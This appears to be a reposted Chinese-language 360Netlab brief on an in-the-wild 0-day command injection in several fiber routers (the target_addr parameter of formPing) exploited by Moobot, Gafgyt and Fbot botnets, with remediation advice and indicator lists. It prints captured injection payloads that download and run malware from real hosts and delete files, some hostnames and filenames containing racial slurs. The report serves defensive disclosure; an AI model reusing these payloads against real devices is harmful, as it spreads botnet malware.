多款光纤路由器设备在野0-day漏洞简报

AA20-106A: Guidance on the North Korean Cyber Threat
April 15, 2020
AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching
April 16, 2020

多款光纤路由器设备在野0-day漏洞简报

本文作者:马延龙叶根深涂凌鸣金晔

大致情况

这是我们过去30天内的第3篇IoT 0-day漏洞文章,之前我们还披露了DrayTek Router在野0-day漏洞分析报告[1],LILIN DVR在野0-day漏洞分析报告[2]。我们观察到僵尸网络存在相互竞争获取更多的Bot规模的情况,其中有些僵尸网络拥有一些0-day漏洞资源,这使它们看起来与众不同。我们正在研究并观察IoT Botnet使用0-day漏洞传播是否是一个新趋势。

2020年2月28日,360Netlab未知威胁检测系统注意到Moobot僵尸网络[3]开始使用一种我们从未见过的新漏洞(多个步骤),并且可以成功攻击受影响的设备。

2020年3月17日,我们确认此漏洞为0-day漏洞,并将结果报告给CNCERT。

2020年3月18日,Exploit Database[4]网站发布了Netlink GPON路由器远程命令执行漏洞PoC,这与我们发现的在野0-day漏洞特征一致。但是,该PoC遗漏了关键的一个步骤,因此实际被注入的命令并不能成功执行。

2020年3月19日,我们与相关厂商联系,被告知设备出厂默认都只开放在LAN侧,确认存在漏洞。

2020年3月19日,我们注意到一个攻击者根据公开的PoC传播Gafgyt僵尸网络。在3月26号,该攻击者将该漏洞集成到Bot中,并进行互联网范围内蠕虫式扫描。

幸运的是,该PoC遗漏了关键的一个步骤,扫描通常会失败。

2020年3月24日,我们注意到另一个攻击者根据公开的PoC传播Fbot僵尸网络,也很快地结束了传播。

目前,我们已经发现共有9款型号的路由器中存在同样的漏洞,很可能他们都是同一原始供应商的OEM产品。

target_addr命令注入漏洞分析

漏洞类型:需要授权的远程命令执行漏洞
漏洞原因:在设备 /bin/boa Web服务端程序内,存在2个函数formPing()formTracert()。它们在处理 /boaform/admin/formPing POST请求时,未检查target_addr参数就调用系统ping命令,从而导致命令注入漏洞。

注入命令列表

%3Bwget%20http://45.58.148.50/n%20-O-|sh
%3Bwget%20http://185.61.138.46/n%20-O-|sh
%3Bwget%20http://194.180.224.13/n%20-O-|sh
%3Bwget%20http://194.180.224.113/n%20-O-|sh
;'+payload+'%20/
;cd /tmp; rm -rf *; busybox wget http://51.254.23.227/bins/n; chmod 777 n; sh n; rm -rf * /
;cd /tmp; rm -rf *; wget http://51.254.23.227/bins/mips; chmod 777 mips; ./mips; rm -rf * /
;cd /tmp; rm -rf *; wget http://51.254.23.227/bins/n; chmod 777 n; sh n; rm -rf * /
;cd /tmp; rm -rf *; wget http://51.254.23.227/bins/netlink; chmod 777 netlink; ./netlink /
;cd /tmp; rm -rf *; wget http://51.254.23.227/bins/polaris.mips; chmod 777 polaris.mips; ./polaris.mips /
;cd /tmp; rm -rf *; wget http://6735a55d.ngrok.io/bins/mips; chmod 777 mips; ./mips; rm -rf * /
;cd /tmp; rm -rf *; wget http://58680dd9.ngrok.io/bins/mips; chmod 777 mips; ./mips; rm -rf * /
;cd /tmp; rm -rf *; wget http://58680dd9.ngrok.io/bins/sh; chmod 777 sh; sh sh; rm -rf * /
;cd /tmp; rm -rf mips; wget http://164.132.92.168:6479/bins/mips; busybox wget http://164.132.92.168:6479/bins/mips; chmod 777 mips; ./mips /
;cd /tmp; rm -rf viktor.mips; wget http://164.132.92.168:6479/bins/viktor.mips; busybox wget http://164.132.92.168:6479/bins/viktor.mips; chmod 777 viktor.mips; ./viktor.mips /
;ls /
;wget http://194.180.224.249/bignigger
;wget http://194.180.224.249/muck.sh -O - | sh

处置建议

我们建议相关运营商检查是否存在漏洞型号设备,默认账号密码等问题,并更新设备固件系统。

我们建议读者对相关域名、IP和URL进行监控和封锁。

使用我们DNSmon的用户,本文涉及的IoC相关域名很早就被自动阻断访问。

联系我们

感兴趣的读者,可以在 twitter 或者通过邮件netlab[at]360.cn联系我们。

IoC list

C2

nlocalhost.wordtheminer.com:9746
164.132.92.173:123
51.254.23.237:100
attack.niggers.me:443

MD5

0a99f9b0472e2e4b9b20657cdde90bbb
0b00195d6162464cbb058024301fc4f3
0bd6066e0fab5d189dc32a7025c99b4d
006581bacd9109b1bf9ee226e4b53c69
05cbda6d4461900bfedf1d126a1f281a
05078ea74df7bb588b5bf984dd0c357f
07b3523f46aa5ed101c0a9f27a0464d9
089a20cf6b2380348f603acf70d8e998
0928b37ce3a9198bdc7c3f54baac396a
1f6874ecffc52d54a4675d7246e326ad
3c08f24b98fb6f9c6b1c9ff20e5a2d1f
3cc06f2dc303be2375fef418b58e42ca
4b4f95d7197f0b0ee84d5ae3941c62b4
5ed943a527353324fa3192b4aaa39b03
6fb9a25d3f645ec6e7ed74801fbd3e16
7ad034dc8413956d480b8f348c890c33
7cfa0eed3a610e0d8e415110b3e65190
7e735868bc62ccae67512847b2a75c9d
8af7c440b85e2c44a2a15fde317c6f65
8b708283e5515f6b4438224124f671c4
8be297b73621818d872c711234b3daec
9a4a798ddabbb58f02773641b618cb74
9cd6deb2d2637243cb4eb11cac6d5cb2
18be5888d4e0da8933fced78f9fb0960
24c328bd0fef770212e3e03be8024993
24ed1ceccdadc19da00aebc3e769d794
25e8d81f0c5157adef22a32c74114e8c
38a6342ed08ccae066858a246d67f73d
50a997f7b5bd1018946caf9117874227
55c4ba138f8679fac72b48ab3566d888
56c71251ebd86c96b6a9c615424a6c8e
80f210834cbbc5415e6045c24b399835
82bae571fdfec253fe293311ce4e9c0d
82cb1a36cc1b659e81e1fe3a5eb5abb6
83c279c71cea9d8ab5b6bd0b2a5aa0f1
93f4f875eb0a77abdc138bdd3dc72ec7
99ee1cc30563217124f11627300661d5
223cb9629da3f70d145207763f081e01
413ba8d86b38a04b7263fc8aa8fb14e6
570dca60a3a719962d92ef4549261903
592c30e702806f57a9158db25750928c
723ebfee5a8d7695fcfafffa75fc40ab
885a52c1950be769b8659889473dc918
949eed7cfe25e6e340aec864fd4becdb
1137f1737e59324e1c237cbe8b91bc57
3386ee08387596f4edc6881caf2407cc
7472ba599c4e6427ccddeabdc031035d
9933d4f6dcb59d1344a47a29c79ff619
73258bf7b4784c551f40cbe672e2748e
76154ed76f33b66973d119c43200f194
91558b8e5ea1a892dc21181460c3e0eb
534798f4d3ea49d6378258358eed10de
623306bcdb9c7ceef47fb47c3266aee9
733270de5536997f0b5f23b8b4f21587
2005292c8c5d4d67b4d051f981a50981
3404206dc241f0865e6b2091f0e506c6
6111797820074d3490daedb22003321e
a5c256db29494179e817ea7c1974773e
a2763e44896d946937b5c9f9f3171d95
aa925baa97fab54a80485c82b64104c7
ab6c2fa4af05c20909d1383091287e5b
b053d3e6d89a26c4c8edf19cde775d90
b8bfde19f504d0c0e55e830a9439d8d9
b918ac324f4ea6b1b8773d2899318555
bc458b7d42cac8d41aa02a752a75542e
bd2d93ec4eabb6578c370ab5dbc26ded
c5e508ea2f0c4c34c7917201346b0893
c6af537d5de188d142658377a51d2212
c800304fb7e6845986d673ce39cbb2d0
cb3fdb886b993e6179a24ec733714882
cdc8cae31e929d99f9aab047329954e5
d1b97657a7e9c75003e522adf0f606f3
d8498b50166021c97c153e33088b2b87
dbb6b9d0bec577e853f85644774608d3
de6bb3ec243cae920cb70fb52c40e8d2
df1e5beba9e9635aa5f072133373d3da
e01ab8c37afbfcfb19083163c0045495
eee0f46d0739fb37d552f350b0608334
f80d4bcf45266e62118755f290dd1f51
fbbab3a8befa60093986c1d447629d7e
fc397251bde53241f2a3826395eca61b
fe2c07723d0864bb2c3976058af8c67d

URL

http://45.58.148.50/n
http://51.254.23.227/bins/mips
http://51.254.23.227/bins/n
http://51.254.23.227/bins/netlink
http://51.254.23.227/bins/polaris.mips
http://164.132.92.168:6479/bins/mips
http://164.132.92.168:6479/bins/viktor.mips
http://185.61.138.46/n
http://194.180.224.13/n
http://194.180.224.113/n
http://194.180.224.249/bignigger
http://194.180.224.249/muck.sh
http://6735a55d.ngrok.io/bins/mips
http://58680dd9.ngrok.io/bins/mips
http://58680dd9.ngrok.io/bins/sh

IP

185.61.138.46       	Netherlands         	ASN49349            	Dotsi, Unipessoal Lda.
45.58.148.50        	United States       	ASN46844            	Sharktech
194.180.224.113     	United States       	ASN44685            	Patron Technology Persia Ltd
194.180.224.13      	United States       	ASN44685            	Patron Technology Persia Ltd
194.180.224.249     	United States       	ASN44685            	Patron Technology Persia Ltd
164.132.92.168      	France              	ASN16276            	OVH SAS             
164.132.92.173      	France              	ASN16276            	OVH SAS             
51.254.23.227       	France              	ASN16276            	OVH SAS             
51.254.23.237       	France              	ASN16276            	OVH SAS 
News Reporter
News Reporter
Head of Operations (Banking), Director IT Governance, Teamlead Microsoft, Service Delivery Manager. Interested in Office 365, LAMP, IT Security and much more!